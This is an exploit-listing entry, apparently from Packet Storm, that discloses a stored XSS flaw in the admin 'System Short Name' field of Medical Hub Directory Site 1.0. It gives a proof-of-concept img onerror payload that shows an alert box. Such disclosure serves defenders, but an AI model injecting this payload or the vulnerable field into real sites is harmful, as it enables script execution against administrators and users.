Share
## https://sploitus.com/exploit?id=PACKETSTORM:166537
## Title: Medical Hub Directory Site 1.0 XSS Stored   
# Author: Hejap Zairy  
# Date: 30.07.2022  
# Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html  
# Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip  
# Reference: https://github.com/Matrix07ksa  
# Tested on: Windows, MySQL, Apache  
  
  
## Description:  
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.  
  
Status: CRITICAL  
[+] Payloads:  
```  
https://0day.gov/mhds/admin/?page=system   
> System Short Name  
<img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img>  
```  
  
## Proof and Exploit:  
https://i.imgur.com/UU6i7SN.png  
https://i.imgur.com/qF6DabE.png